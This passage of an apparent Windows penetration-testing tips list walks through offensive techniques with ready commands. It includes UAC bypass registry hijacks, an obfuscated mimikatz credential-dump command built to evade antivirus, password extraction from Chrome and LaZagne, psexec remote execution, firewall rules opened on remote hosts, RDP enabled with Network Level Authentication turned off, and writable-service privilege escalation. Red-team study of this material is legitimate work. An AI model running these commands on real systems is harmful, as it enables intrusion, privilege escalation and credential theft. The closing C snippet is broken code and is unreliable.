$string | Out-File -FilePath "C:\Users\a\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1" -Append
```From:
https://rastamouse.me/2018/03/a-view-of-persistence/
#### Method 20: xml file
Reference:
[《https://3gstudent.github.io/%E5%88%A9%E7%94%A8wmic%E8%B0%83%E7%94%A8xsl%E6%96%87%E4%BB%B6%E7%9A%84%E5%88%86%E6%9E%90%E4%B8%8E%E5%88%A9%E7%94%A8/》](https://3gstudent.github.io/%E5%88%A9%E7%94%A8wmic%E8%B0%83%E7%94%A8xsl%E6%96%87%E4%BB%B6%E7%9A%84%E5%88%86%E6%9E%90%E4%B8%8E%E5%88%A9%E7%94%A8)
---
### Tips 31. UAC bypass
#### Method 1: use eventvwr.exe and registry hijacking
Applicable: Win7, Win8.1, Win 10
https://github.com/3gstudent/UAC-Bypass/blob/master/Invoke-EventVwrBypass.ps1
Reference:
[《Study Notes of WMI Persistence using wmic.exe》](https://3gstudent.github.io/Study-Notes-of-WMI-Persistence-using-wmic.exe)
[《Userland registry hijacking》](https://3gstudent.github.io/Userland-registry-hijacking)
#### Method 2: use sdclt.exe
For Win10
Reference:
[《Study Notes of using sdclt.exe to bypass UAC》](https://3gstudent.github.io/Study-Notes-of-using-sdclt.exe-to-bypass-UAC)
#### Method 3: use SilentCleanup
For Win8, Win10
```
reg add hkcu\Environment /v windir /d "cmd /K reg delete hkcu\Environment /v windir /f && REM "
schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
```Reference:
[《Study Notes of using SilentCleanup to bypass UAC》](https://3gstudent.github.io/Study-Notes-of-using-SilentCleanup-to-bypass-UAC)
#### Method 4: use wscript.exe
Only for Win7
https://github.com/EmpireProject/Empire/blob/master/data/module_source/privesc/Invoke-WScriptBypassUAC.ps1
Reference:
[《Empire中的Invoke-WScriptBypassUAC利用分析》](https://3gstudent.github.io/Empire%E4%B8%AD%E7%9A%84Invoke-WScriptBypassUAC%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90)
#### Method 5: use cmstp.exe
https://msitpros.com/?p=3960
Only for Win7
#### Method 5: Modify environment variables, hijack high-privilege .Net programs
For Win7-Win10
Eg. gpedit.msc
Modify the environment variables, use the CLR to hijack the boot process of gpedit.msc.
Reference:
[《Use CLR to bypass UAC》](https://3gstudent.github.io/Use-CLR-to-bypass-UAC)
#### Method 6: Modify the registry HKCU\Software\Classes\CLSID, hijack high-privilege program
For Win7-Win10
- {B29D466A-857D-35BA-8712-A758861BFEA1}
- {D5AB5662-131D-453D-88C8-9BBA87502ADE}
- {0A29FF9E-7F9C-4437-8B11-F424491E3931}
- {CB2F6723-AB3A-11D2-9C40-00C04FA30A3E}Reference:
[《Use CLR to bypass UAC》](https://3gstudent.github.io/Use-CLR-to-bypass-UAC)
#### Method 7: Use COM Components
Modify process information, spoof PSAPI, call COM component to implement unauthorized operation.
Reference:
[《通过COM组件IFileOperation越权复制文件》](https://3gstudent.github.io/%E9%80%9A%E8%BF%87COM%E7%BB%84%E4%BB%B6IFileOperation%E8%B6%8A%E6%9D%83%E5%A4%8D%E5%88%B6%E6%96%87%E4%BB%B6)
[《通过COM组件NetFwPolicy2越权关闭防火墙》](https://3gstudent.github.io/%E9%80%9A%E8%BF%87COM%E7%BB%84%E4%BB%B6NetFwPolicy2%E8%B6%8A%E6%9D%83%E5%85%B3%E9%97%AD%E9%98%B2%E7%81%AB%E5%A2%99)
[《通过COM组件IARPUninstallStringLauncher绕过UAC》](https://3gstudent.github.io/%E9%80%9A%E8%BF%87COM%E7%BB%84%E4%BB%B6IARPUninstallStringLauncher%E7%BB%95%E8%BF%87UAC)
---
### Tips 32. The exe or DLL generated by Visual Studio is used in other systems, indicating the lack of relevant DLL files.
Workaround: Package the program for release.
Project Menu -> Project Properties, C / C + + -> Code Generation -> Run Library, select multi-threading (/MT)
---
### Tips 33. Use LaZagne to export passwords stored in common applications in the current system.
You can use LaZagne to export passwords stored in common applications in the current system (eg browser, Wifi, Git, Outlook, etc.)
https://github.com/AlessandroZ/LaZagne
Of course, you can also modify the LaZagne source code to implement password export for other applications.
Reference:
[《本地密码查看工具LaZagne中的自定义脚本开发》](https://3gstudent.github.io/%E6%9C%AC%E5%9C%B0%E5%AF%86%E7%A0%81%E6%9F%A5%E7%9C%8B%E5%B7%A5%E5%85%B7LaZagne%E4%B8%AD%E7%9A%84%E8%87%AA%E5%AE%9A%E4%B9%89%E8%84%9A%E6%9C%AC%E5%BC%80%E5%8F%91)
---
### Tips 34. Use powershell to read and write files
Read a text file:
```
$file = Get-Content "1.txt"
```Write a text file:
```
Set-content "1.txt"
```Read a binary file:
```
[System.IO.File]::ReadAllBytes('1.exe')
```Write a binary file:
```
[System.IO.File]::WriteAllBytes("1.exe",$fileContentBytes)
```---
### Tips 35. powershell for base64 encoding/decoding
Encoding:
```
$encoded = [System.Convert]::ToBase64String($fileContent)
```Decoding:
```
$fileContent = [System.Convert]::FromBase64String($encoded)
```Reference:
[《Study Notes of using BGInfo to bypass Application Whitelisting》](https://3gstudent.github.io/Study-Notes-of-using-BGInfo-to-bypass-Application-Whitelisting)
---
### Tips 36 If the powershell script is killed, try using Invoke-Obfuscation for confusion.
https://github.com/danielbohannon/Invoke-Obfuscation
Eg.
Set the code to be confused:
```
set scriptblock " Invoke-111111 -Command "log privilege::debug sekurlsa::logonpasswords exit" "
```Enter `encoding`
Enter `1` and specify the encoding as ascii
Get confused code:
```
" $(SEt-iTem 'VARIaBle:OFS' '' ) "+ [StRinG](( 73,110 , 118 ,111, 107, 101, 45, 49, 49 ,49 ,49 ,49 , 49, 32 , 45 , 67, 111, 109 , 109, 97 , 110 , 100 , 32,34,108, 111, 103 ,32, 112 ,114 , 105,118,105,108, 101, 103 ,101, 58 , 58 , 100 , 101 , 98, 117 ,103,32 , 115,101,107 ,117,114 , 108,115, 97 ,58 , 58, 108 ,111 ,103,111,110, 112, 97, 115 ,115,119, 111, 114, 100, 115, 32, 101, 120,105,116 ,34 )|FOReacH-objeCT{( [ChAR][iNT] $_) } ) +"$( Set-variAbLE 'oFS' ' ' ) "|. ( $env:PUbLic[13]+$eNv:PuBlIc[5]+'x')
```---
### Tips 37 python script to exe
Two common methods:
- Use py2exe
- Use PyInstallerHow to use and common bug fixes can refer to the reference link
Reference:[《本地密码查看工具LaZagne中的自定义脚本开发》](https://3gstudent.github.io/%E6%9C%AC%E5%9C%B0%E5%AF%86%E7%A0%81%E6%9F%A5%E7%9C%8B%E5%B7%A5%E5%85%B7LaZagne%E4%B8%AD%E7%9A%84%E8%87%AA%E5%AE%9A%E4%B9%89%E8%84%9A%E6%9C%AC%E5%BC%80%E5%8F%91)
---
### Tips 38 Normal user rights write files to the path of administrator rights
Eg.
Release files to the `c:\windows` folder with normal user rights
```
makecab c:\test\test.exe %TMP%\1.tmp
wusa %TMP%\1.tmp /extract:"c:\windows" /quiet
```Applicable to Win7, Win8, learning from:
https://github.com/EmpireProject/Empire/blob/master/data/module_source/privesc/Invoke-WScriptBypassUAC.ps1
Reference:
[《Empire中的Invoke-WScriptBypassUAC利用分析》](https://3gstudent.github.io/Empire%E4%B8%AD%E7%9A%84Invoke-WScriptBypassUAC%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90)
---
### Tips 39 Summary of methods for executing programs on remote systems
Common methods:
- at
- psexec
- WMIC
- wmiexec
- smbexec
- powershell remotingPsexec usage:
```
psexec.exe \\test.local /accepteula -u test\admin -p test123! -s -c test.bat
```Test.bat is local
New method:
- DCOM
Reference:
[《域渗透——利用DCOM在远程系统执行程序》](https://3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E5%88%A9%E7%94%A8DCOM%E5%9C%A8%E8%BF%9C%E7%A8%8B%E7%B3%BB%E7%BB%9F%E6%89%A7%E8%A1%8C%E7%A8%8B%E5%BA%8F)
---
### Tips 40 Looking for services that can be utilized in Windows systems
Enumerate the path of the executable file corresponding to the Windows system service. If the path contains the write permission of the normal user, the service can be used to increase the permission.
powershell code:
```
$ErrorActionPreference="SilentlyContinue"
$out = (Get-WmiObject win32_service | select PathName)
$out|% {[array]$global:path += $_.PathName}
for($i=0;$i -le $out.Count-1;$i++)
{
$a=Get-Acl -Path $out[$i].PathName.ToUpper().Substring($out[$i].PathName.ToUpper().IndexOfAny("C"),$out[$i].PathName.ToUpper().LastIndexOfAny("\"))
If($a.Owner -ne "NT AUTHORITY\SYSTEM"){
If($a.Owner -ne "NT SERVICE\TrustedInstaller"){
If($a.Owner -ne "BUILTIN\Administrators"){
Get-WmiObject win32_service | ?{$_.PathName -like $out[$i].PathName}|select Name,PathName,ProcessId,StartMode,State,Status
Write-host Owner: $a.Owner
}
}
}
}
Write-host [+] All done.
```Reference:
[《Use powershell to find a writable windows service》](https://3gstudent.github.io/Use-powershell-to-find-a-writable-windows-service)
---
### Tips 41 Use anti-virus software configuration errors to achieve self-starting and prioritizing anti-virus software execution
Windows system supports Logon Scripts. Logon Scripts are executed at system startup. The execution order takes precedence over anti-virus software. Of course, anti-virus software cannot intercept the scripts in Logon Scripts (anti-virus software has not been started).
The key is whether the anti-virus software will intercept the configuration of Logon Scripts.
Add Logon Scripts with special operations, antivirus software will not intercept.
**Note:**
The anti-virus software mentioned above refers to "partial" anti-virus software, which is not universal.
Reference:
[《Use Logon Scripts to maintain persistence》](https://3gstudent.github.io/Use-Logon-Scripts-to-maintain-persistence)
---
### Tips 42 Compiling c# program notes
Use Visual Studio:
The project name should correspond to the name specified by namespace. If it does not correspond, it can be modified in the project-attribute-assembly name. Otherwise, the generated dll cannot be used.
Use csc.exe:
Eg.
```
using System;
using System.Diagnostics;namespace TestDotNet
{
public class Class1
{
static Class1()
{
Process.Start("cmd.exe");
Environment.Exit(0);
}
}
}
```Save it as TestDotNet.cs and just use csc.exe to generate it:
`C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:library TestDotNet.cs`
If saved as a.cs, then you need to add /out parameter to specify the output file as TestDotNet.dll, so the assembly name is also defaulted to TestDotNet (corresponding to the same code), otherwise, although the dll can be loaded, but can not be executed, the parameters are as follows :
`C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:library /out:TestDotNet.dll a.cs`
---
### Tips 43 Port problem with IPC connection
Use IPC connection, if the target is enabled with NetBIOS over TCP/IP, then:
1. The target opens both ports 139 and 445, and the system preferentially uses port 445.
2. Target disables port 445 and can connect using port 139Target If NetBIOS over TCP/IP is disabled, then:
1. Target disables port 445 and cannot connect
---
### Tips 44 Get TrustedInstaller Permissions
Start the service TrustedInstaller and get the TrustedInstaller permission through Token replication.
Common methods:
- SelectMyParent
- Invoke-TokenManipulation.ps1
- incognitoReference:
[渗透技巧——Token窃取与利用](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Token%E7%AA%83%E5%8F%96%E4%B8%8E%E5%88%A9%E7%94%A8)
---
### Tips 45 3389 Remote Desktop Connection
#### 1, Query whether the system allows 3389 remote desktop connection:
`REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections`
1 means closed, 0 means open
View the port of the remote desktop connection:
`REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber`
#### 2, the method of opening 3389 Remote Desktop Connection
Method 1: cmd
```
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f
```Method 2: reg file
The content is as follows:
```
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00000d3d
```Import the registry:
`regedit /s a.reg`
**Note:**
Modify the connection port to take effect after restarting
**supplement**
If the system has not been configured with Remote Desktop Services, you will need to add a firewall rule when you first open it, allowing port 3389. The command is as follows:
`netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow`
If the connection fails and it says:`An authentication error has occurred.The function requested is not supported.`
We need to close this: `Allow connections only from computers running Remote Desktop with Network Level Authentication (recommended)`
`REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0x00000000 /f`
#### 3, connect the remote desktop
Kali:
`rdesktop 192.168.1.1:3389`
Windows:
`mstsc.exe`
Non-server version of Windows, only one account is allowed to log in by default.
The specific performance is:
When logging in remotely, use the same account as the original system, the original system will be switched to the login interface.
Use a different account, the original system desktop will prompt you to disconnect the current connection (default selection after 30 seconds)
**Solution:**
Use mimikatz.exe to execute `ts::multirdp` to allow multiple users to log in remotely.
The ability to achieve remote login of different accounts does not conflict, the original system desktop will not prompt the box.
Of course, use the same account as the original system, the original system will still be switched to the login interface.
**Note:**
This method fails after the system restarts. The next time you use it, you need to re-execute the command `ts::multirdp`.
It will be permanently modified by modifying the file termsrv.dll.
Reference:
[《渗透技巧——Windows系统远程桌面的多用户登录》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E7%B3%BB%E7%BB%9F%E8%BF%9C%E7%A8%8B%E6%A1%8C%E9%9D%A2%E7%9A%84%E5%A4%9A%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95)
---
### Tips 46 Use netsh to modify firewall rules for remote systems
The remote system needs to allow the Windows Firewall to remotely manage.
The open command is as follows:```
netsh advfirewall set currentprofile settings remotemanagement enable
```Eg.
```
netsh -r 192.168.0.2 -u TEST\administrator -p domain123! advfirewall firewall add rule name="any" protocol=TCP dir=in localport=any action=allow
```Reference:
[《域渗透——利用DCOM在远程系统执行程序》](https://3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E5%88%A9%E7%94%A8DCOM%E5%9C%A8%E8%BF%9C%E7%A8%8B%E7%B3%BB%E7%BB%9F%E6%89%A7%E8%A1%8C%E7%A8%8B%E5%BA%8F)
---
### Tips 47 Hijacking UAC
When the UAC prompt box is popped up, execute arbitrary code, and insert the payload by modifying the function of the registry hijacking signature verification.
Reference:
[《Authenticode签名伪造——PE文件的签名伪造与签名验证劫持》](https://3gstudent.github.io/Authenticode%E7%AD%BE%E5%90%8D%E4%BC%AA%E9%80%A0-PE%E6%96%87%E4%BB%B6%E7%9A%84%E7%AD%BE%E5%90%8D%E4%BC%AA%E9%80%A0%E4%B8%8E%E7%AD%BE%E5%90%8D%E9%AA%8C%E8%AF%81%E5%8A%AB%E6%8C%81)
---
### Tips 48 Authenticode signature forgery of PE files
By modifying the registry, you can add a Microsoft certificate to the PE file.
Reference:
[《Authenticode签名伪造——PE文件的签名伪造与签名验证劫持》](https://3gstudent.github.io/Authenticode%E7%AD%BE%E5%90%8D%E4%BC%AA%E9%80%A0-PE%E6%96%87%E4%BB%B6%E7%9A%84%E7%AD%BE%E5%90%8D%E4%BC%AA%E9%80%A0%E4%B8%8E%E7%AD%BE%E5%90%8D%E9%AA%8C%E8%AF%81%E5%8A%AB%E6%8C%81)
[《Authenticode签名伪造——针对文件类型的签名伪造》](https://3gstudent.github.io/Authenticode%E7%AD%BE%E5%90%8D%E4%BC%AA%E9%80%A0-%E9%92%88%E5%AF%B9%E6%96%87%E4%BB%B6%E7%B1%BB%E5%9E%8B%E7%9A%84%E7%AD%BE%E5%90%8D%E4%BC%AA%E9%80%A0)
---
### Tips 49 Catalog signature forgery of PE files
Construct Long UNC file name, implement file name spoofing, get Catalog signature
Reference:
[《Catalog签名伪造——Long UNC文件名欺骗》](https://3gstudent.github.io/Catalog%E7%AD%BE%E5%90%8D%E4%BC%AA%E9%80%A0-Long-UNC%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97)
---
### Tips 50 mklink
Used to create symbolic links, which can be understood as shortcuts.
Create the directory c:\test\1, point to c:\temp, and use the following actions:
(1) Create a link with the /D parameter command:
Mklink /D "c:\test\1" "c:\Temp"
(2) Create a join using the /J parameter command:Mklink /J "c:\test\1" "c:\Temp"
difference:
The link created with the /D parameter has more "file shortcuts" for file attributes.
Use /J does not require administrator privileges.
Use /D requires administrator privileges.
**Application scenario:**
Change the path to the released file.---
### Tips 51Passes parameters when executing powershell scripts
```
powershell -executionpolicy bypass -Command "Import-Module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz -DumpCerts"powershell -executionpolicy bypass -Command "Import-Module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz -Command ""log ""privilege::debug"" ""sekurlsa::logonpasswords"""""
```---
### Tips 52 dll injection method
#### 1, APC
Reference:
[《通过APC实现Dll注入——绕过Sysmon监控》](https://3gstudent.github.io/%E9%80%9A%E8%BF%87APC%E5%AE%9E%E7%8E%B0Dll%E6%B3%A8%E5%85%A5-%E7%BB%95%E8%BF%87Sysmon%E7%9B%91%E6%8E%A7)
#### 2, process hollowing
Reference:
[《傀儡进程的实现与检测》](https://3gstudent.github.io/%E5%82%80%E5%84%A1%E8%BF%9B%E7%A8%8B%E7%9A%84%E5%AE%9E%E7%8E%B0%E4%B8%8E%E6%A3%80%E6%B5%8B)
#### 3, Process Doppelgänging
Reference:
[《Process Doppelganging利用介绍》](https://3gstudent.github.io/Process-Doppelganging%E5%88%A9%E7%94%A8%E4%BB%8B%E7%BB%8D)
---
### Tips 53 Default shared directory in the domain
```
\\\SYSVOL\\
```All hosts in the domain can access, which saves group policy related data, including login script configuration files, etc.
Reference:
[《域渗透——利用SYSVOL还原组策略中保存的密码》](https://3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E5%88%A9%E7%94%A8SYSVOL%E8%BF%98%E5%8E%9F%E7%BB%84%E7%AD%96%E7%95%A5%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81)
---
### Tips 54 Your TeamViewer may be hacked
If your TeamViewer version is `13.0.5058`, don't feel free to connect to an unknown TeamViewer server, it may be hacked.
Reference:
[《TeamViewer 13.0.5058中的权限漏洞测试》](https://3gstudent.github.io/TeamViewer-13.0.5058%E4%B8%AD%E7%9A%84%E6%9D%83%E9%99%90%E6%BC%8F%E6%B4%9E%E6%B5%8B%E8%AF%95)
---
### Tips 55 Remotely view domain-related login and logout related logs:
#### Method 1:
```
wevtutil qe security /rd:true /f:text /q:"*[System[(EventID=4672 or EventID=4623 or EventID=4672) and TimeCreated[@SystemTime>='2022-05-26T02:30:39' and @SystemTime<='2022-05-26T02:31:00']]]" /r:dc1 /u:administrator /p:passwordwevtutil qe security /rd:true /f:text /q:"(Event/System/EventID=4624 or 4623 or 4672) and Event/System/TimeCreated/@SystemTime >= '2022-05-26T02:30:39' and Event/System/TimeCreated/@SystemTime <= '2022-05-26T02:31:00'" /r:dc1 /u:administrator /p:password
```#### Method 2
(Not recommended, direct download file is too large)
Obtain the domain control file: `C:\Windows\System32\winevt\Logs\Security.evtx`, filter event 4624/4623/4672.
---
### Tips 56 Determine if the current system is in standby mode.
The function return value of GetForegroundWindow() in the lock screen state is NULL, and the return value of GetForegroundWindow() function in non-lock screen state is a non-zero value.
Reference:
https://stackoverflow.com/questions/9563549/what-happens-behind-the-windows-lock-screen
Powershell POC:
https://github.com/3gstudent/Writeup/blob/master/CheckStandby.ps1
---
### Tips 57 Get the current system user no input time
Judge through API GetIdleTime.
c#:https://www.codeproject.com/Articles/13384/Getting-the-user-idle-time-with-C
powershell:
https://github.com/3gstudent/Writeup/blob/master/GetIdleTime.ps1
---
### Tips 58 Determine the screen saver startup time of the current system
Determine whether to open the screen saver:
Find the registry `HKEY_CURRENT_USER\Control Panel\Desktop`, if there is a key value `SCRNSAVE.EXE`.
```
REG QUERY "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE
```If the screen saver is turned on, check the key value `ScreenSaveTimeOut` to get the screen saver startup time (in seconds).
```
REG QUERY "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeOut
```---
### Tips 59 Hide the interface of the specified process
Change window state via API ShowWindowAsync.
POC:
https://github.com/3gstudent/Writeup/blob/master/HiddenProcess.ps1
---
### Tips 60 Screen capture of Windows system via Powershell
https://gallery.technet.microsoft.com/scriptcenter/eeff544a-f690-4f6b-a586-11eea6fc5eb8/file/50729/1/Take-ScreenShot.ps1
---
### Tips 61 View the programs currently installed on Windows systems
Obtained by enumerating the registry keys HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
**Note:**
The directory of the 32-bit program under the 64-bit system is `HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall`
POC:
https://github.com/3gstudent/ListInstalledPrograms
---
### Tips 62 Get the current system type via wmi
```
wmic /NAMESPACE:"\\root\CIMV2" PATH Win32_ComputerSystem get PCSystemType /FORMAT:list
```|Value|Meaning|
| - | - |
|0 (0x0) |Unspecified|
|1 (0x1) |Desktop|
|2 (0x2) |Mobile|
|3 (0x3) |Workstation|
|4 (0x4) |Enterprise Server|
|5 (0x5) |Small Office and Home Office (SOHO) Server|
|6 (0x6) |Appliance PC|
|7 (0x7) |Performance Server|
|8 (0x8) |Maximum|---
### Tips 63 Export the password saved by the Chrome browser
#### 1, online
Method 1:
Read the database file `%LocalAppData%\Google\Chrome\User Data\Default\Login Data`. If the Chrome browser is running and cannot be read directly, you need to copy it first.
Direct decryption in the current system call API CryptUnprotectData.
Method 2:
mimikatz
```
vault::cred
```Reference:
[《渗透技巧——导出Chrome浏览器中保存的密码》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E5%AF%BC%E5%87%BAChrome%E6%B5%8F%E8%A7%88%E5%99%A8%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81)
#### 2, offline
You do not need to obtain the user's plain text password when using the Master Key.
Reference:
[《渗透技巧——利用Masterkey离线导出Chrome浏览器中保存的密码》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E5%88%A9%E7%94%A8Masterkey%E7%A6%BB%E7%BA%BF%E5%AF%BC%E5%87%BAChrome%E6%B5%8F%E8%A7%88%E5%99%A8%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81)
---
### Tips 65 Get the history file of the system through ShadowCopy
Query whether the current system has a snapshot:
```
vssadmin list shadows
```Access the files in the history snapshot:
```
mklink /d c:\testvsc \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy15\
dir c:\testvsc
```Reference:
[《域渗透——获得域控服务器的NTDS.dit文件》](https://3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E8%8E%B7%E5%BE%97%E5%9F%9F%E6%8E%A7%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%9A%84NTDS.dit%E6%96%87%E4%BB%B6)
---
### Tips 64 How to execute multiple commands on the command line
```
aa && bb
```Execute aa, and then execute bb after success.
```
aa || bb
```Execute aa first. If the execution is successful, bb is no longer executed. If it fails, bb is executed again.
```
aa & bb
```Execute aa first and then bb, regardless of whether aa is successful.
---
### Tips 65 Sending mail via powershell (with attachments)
Two methods, the code can refer to:
https://github.com/3gstudent/SendMail-with-Attachments
---
### Tips 66 Get the remote desktop connection history of all users by reading the registry with powershell
The default read registry can only get the registry information of the currently logged in user. You can get the registry configuration of the unlogged in user by loading the configuration unit with `reg load`.
The code can refer to:
https://github.com/3gstudent/ListInstalledPrograms
Reference:
[《渗透技巧——获得Windows系统的远程桌面连接历史记录》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E8%8E%B7%E5%BE%97Windows%E7%B3%BB%E7%BB%9F%E7%9A%84%E8%BF%9C%E7%A8%8B%E6%A1%8C%E9%9D%A2%E8%BF%9E%E6%8E%A5%E5%8E%86%E5%8F%B2%E8%AE%B0%E5%BD%95)
---
### Tips 67 Use pscp to upload files from Windows to Linux via the command line
download link:
https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
The upload command is as follows:
```
pscp.exe -l root -pw toor -r c:\1\putty.exe 192.168.62.131:/root/
```It will prompt whether to store the cache file.
Enter `Y`, create a new key in the registry: `HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\SshHostKeys`, do not need to enter `Y` again for the next connection.
Enter `N`, do not save the registry key.
Implement the method of automatically entering the `N` command:
```
echo n |pscp.exe -l root -pw toor -r c:\1\putty.exe 192.168.62.131:/root/
```---
### Tips 68 Enumeration of Windows System Handles
- On Windows 8 and later, NtQueryInformationProcess with ProcessHandleInformation is the most efficient method.
- On Windows XP and later, NtQuerySystemInformation with SystemExtendedHandleInformation.
- On Windows 7 and later, NtQuerySystemInformation with SystemHandleInformation can be used.Note:
- WinXP and Win7,ObjectTypeNumber = 0x1c
- Win8 and later,ObjectTypeNumber = 0x1e---
### Tips 69 Use rar.exe to compressed file
https://github.com/3gstudent/test/raw/master/rar.exe
Maximum compression ratio:
```
rar.exe a -m5 1.rar 1.txt -p123456
```Volume compression, one compression package per 10MB:
```
rar.exe a -m5 -v10m 1.rar 1.txt -p123456
```Decompression:
```
rar.exe e 1.rar -p123456
```---
### Tips 70 Use the command tasklist/v to column processes
The /v parameter shows detailed information, which is helpful for collecting information.
---
### Tips 71 Remove the first string from the array in C language
```
WCHAR srcString[20] = L"I love you!";
WCHAR targetString[20];
wcsncpy_s(targetString, wcslen(targetString), srcString + 1, (wcslen(targetString) - 1);
wprintf_s(L"%s\n", targetString);
```---